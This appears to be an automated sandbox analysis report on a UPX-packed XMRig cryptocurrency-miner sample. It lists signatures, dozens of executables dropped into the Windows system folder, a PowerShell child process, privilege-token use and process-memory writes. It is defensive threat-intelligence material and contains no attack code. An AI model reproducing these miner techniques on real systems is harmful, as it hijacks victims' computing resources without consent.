Malware Analysis Report

2025-04-19 18:41

Sample ID 240527-hb77psca56
Target 78371ae98fcb173894987ffaf3bd9231_JaffaCakes118
SHA256 baf10c680b23970d32f44128aade9f56f4fb9d285e1a2f595b9260150738020f
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

baf10c680b23970d32f44128aade9f56f4fb9d285e1a2f595b9260150738020f

Threat Level: Known bad

The file 78371ae98fcb173894987ffaf3bd9231_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

xmrig

Xmrig family

XMRig Miner payload

XMRig Miner payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

UPX packed file

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 06:34

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 06:34

Reported

2024-05-27 06:37

Platform

win7-20240419-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\DwgbBFR.exe N/A
N/A N/A C:\Windows\System\bZpjHie.exe N/A
N/A N/A C:\Windows\System\XBAFwez.exe N/A
N/A N/A C:\Windows\System\ObCCrpL.exe N/A
N/A N/A C:\Windows\System\ERkbqPk.exe N/A
N/A N/A C:\Windows\System\zFDbmiX.exe N/A
N/A N/A C:\Windows\System\usOrQbM.exe N/A
N/A N/A C:\Windows\System\bUThkLF.exe N/A
N/A N/A C:\Windows\System\LnfFjfA.exe N/A
N/A N/A C:\Windows\System\uNExlBv.exe N/A
N/A N/A C:\Windows\System\ztSrceU.exe N/A
N/A N/A C:\Windows\System\AFzhVuR.exe N/A
N/A N/A C:\Windows\System\WTAAciN.exe N/A
N/A N/A C:\Windows\System\yLNFPir.exe N/A
N/A N/A C:\Windows\System\kWUNrbH.exe N/A
N/A N/A C:\Windows\System\SStcNtA.exe N/A
N/A N/A C:\Windows\System\pdxFzOX.exe N/A
N/A N/A C:\Windows\System\lDcyDzt.exe N/A
N/A N/A C:\Windows\System\TMquOAO.exe N/A
N/A N/A C:\Windows\System\JFJThNT.exe N/A
N/A N/A C:\Windows\System\cHOAffe.exe N/A
N/A N/A C:\Windows\System\onWTCHy.exe N/A
N/A N/A C:\Windows\System\pQPuWvN.exe N/A
N/A N/A C:\Windows\System\yGohpOV.exe N/A
N/A N/A C:\Windows\System\WnYTmKA.exe N/A
N/A N/A C:\Windows\System\glHHCvA.exe N/A
N/A N/A C:\Windows\System\TPIVpik.exe N/A
N/A N/A C:\Windows\System\vkbDuwW.exe N/A
N/A N/A C:\Windows\System\UQqdLaw.exe N/A
N/A N/A C:\Windows\System\jiBmTTt.exe N/A
N/A N/A C:\Windows\System\efNSaFe.exe N/A
N/A N/A C:\Windows\System\qyKYWds.exe N/A
N/A N/A C:\Windows\System\teHxCVx.exe N/A
N/A N/A C:\Windows\System\gHKBzPW.exe N/A
N/A N/A C:\Windows\System\SEXVkNA.exe N/A
N/A N/A C:\Windows\System\xwqTYhV.exe N/A
N/A N/A C:\Windows\System\pPHLrFp.exe N/A
N/A N/A C:\Windows\System\jbcLJvE.exe N/A
N/A N/A C:\Windows\System\eTplTJF.exe N/A
N/A N/A C:\Windows\System\UbJppFB.exe N/A
N/A N/A C:\Windows\System\TyyTWmT.exe N/A
N/A N/A C:\Windows\System\HbjynPd.exe N/A
N/A N/A C:\Windows\System\OQDujtB.exe N/A
N/A N/A C:\Windows\System\jcfKdWw.exe N/A
N/A N/A C:\Windows\System\myLSDAH.exe N/A
N/A N/A C:\Windows\System\hBhocbo.exe N/A
N/A N/A C:\Windows\System\jHKDAXc.exe N/A
N/A N/A C:\Windows\System\RmfYnhX.exe N/A
N/A N/A C:\Windows\System\OlHKoDu.exe N/A
N/A N/A C:\Windows\System\TdLGPrP.exe N/A
N/A N/A C:\Windows\System\SAXoiss.exe N/A
N/A N/A C:\Windows\System\jEBbLRb.exe N/A
N/A N/A C:\Windows\System\cZrvxUb.exe N/A
N/A N/A C:\Windows\System\tHAtheL.exe N/A
N/A N/A C:\Windows\System\CHfvicM.exe N/A
N/A N/A C:\Windows\System\yaTYwah.exe N/A
N/A N/A C:\Windows\System\lGJNeag.exe N/A
N/A N/A C:\Windows\System\asLPMcq.exe N/A
N/A N/A C:\Windows\System\VEabaik.exe N/A
N/A N/A C:\Windows\System\lbRwDuJ.exe N/A
N/A N/A C:\Windows\System\KMnaRgJ.exe N/A
N/A N/A C:\Windows\System\dVQhErm.exe N/A
N/A N/A C:\Windows\System\dLiYfUR.exe N/A
N/A N/A C:\Windows\System\sjGPmSw.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\lbBzMBR.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\MMXYOcu.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\WxFCvXz.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\bOIVSNC.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\BQJcqRd.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\CziaDsM.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\vbfJFsO.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\SilPUED.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\lnLhnyq.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\mEymhVc.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\WyCzZUQ.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\jsbttnV.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\foYiDWX.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\yBxVCNU.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\VmNeAxs.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ByUhrsg.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\GXIAXRh.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\YynqNxI.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\zUgezMd.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\VsLKerO.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\OUlHuuG.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\zOjcgWo.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\VIxbUQN.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\KPyCIMq.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ifVHeqh.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\bXpqaCi.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\VZIoTrN.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\NRiPIHM.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\NDxqGWN.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\tyNiMaO.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ghSbtji.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\EgxQucQ.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ZTBvbnq.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ktnezet.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\uygkkst.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\esqEkNM.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\AlBbLZr.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\dboUEZF.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\qTAmzYz.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\NtNubGD.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\KbTaPLx.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ahNntTa.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\owXzoSu.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\kOCJgbv.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\vjuZXxa.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\wIkmQMd.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ZaVRSFF.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\vvXtpgX.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\SbCwFCJ.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\OgUpZcm.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\PHvGjck.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\PuEzRAI.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\wtKXhDe.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\MOsEkSr.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\zMvfZPk.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ipjyvaa.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\hNlxfNz.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\SvuvPBk.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\gGRaZjJ.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\KGAjHUW.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\eHAqZQM.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\iIxylDl.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\GTWmLWG.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\RYEugEt.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2444 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2444 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2444 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2444 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\DwgbBFR.exe
PID 2444 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\DwgbBFR.exe
PID 2444 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\DwgbBFR.exe
PID 2444 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\bZpjHie.exe
PID 2444 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\bZpjHie.exe
PID 2444 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\bZpjHie.exe
PID 2444 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\XBAFwez.exe
PID 2444 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\XBAFwez.exe
PID 2444 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\XBAFwez.exe
PID 2444 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ERkbqPk.exe
PID 2444 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ERkbqPk.exe
PID 2444 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ERkbqPk.exe
PID 2444 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ObCCrpL.exe
PID 2444 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ObCCrpL.exe
PID 2444 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ObCCrpL.exe
